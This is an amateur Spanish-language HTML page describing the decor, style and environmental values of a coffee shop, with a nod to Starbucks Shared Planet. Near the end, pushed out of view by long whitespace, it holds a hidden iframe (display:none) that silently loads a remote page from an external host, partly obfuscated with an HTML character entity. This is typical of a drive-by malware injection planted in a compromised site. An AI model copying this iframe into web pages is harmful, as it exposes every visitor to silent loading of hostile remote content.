<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
	<link rel="stylesheet" href="menu.css">
<title></title>
</head>
<style type="text/css">
body {
	background: url("1111.jpg");
	background-attachment: fixed;
	background-repeat: no-repeat;
	background-size: cover;
}
</style>
<br>

<font color="red" face="AR DELANEY" size="7">
		<center><p>DECORACION Y ESTILO DE NUESTRA TIENDAD</p>

		</font>
<p><p>
		<p>cafeteria</p></br>
        

<br>
<br>

<br>
<br>
<font color="blue" face="AR DELANEY" size="4">


El estilo y la sustentabilidad, son parte de nuestra esencia.

Creemos que una mejor y  debe de ser un sitio donde te sientas bien y con el que conectes. Debe integrarse en la vida del lugar del que forma parte y su impacto medioambiental debe de ser lo mejor.

Los estilos de nuestras tiendas tienen su origen en nuestra herencia cafetera y en nuestras metas de Starbucks  Shared Planet sobre la convivencia en la comunidad y la responsabilidad hacia el medio ambiente.

<br>
<br>
<div id="header">
	<ul class="nav">
	 	        <li><a href="inicio.html">tienda</a></li>
	  
		  <ul>
		                                                                          
<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>
</body>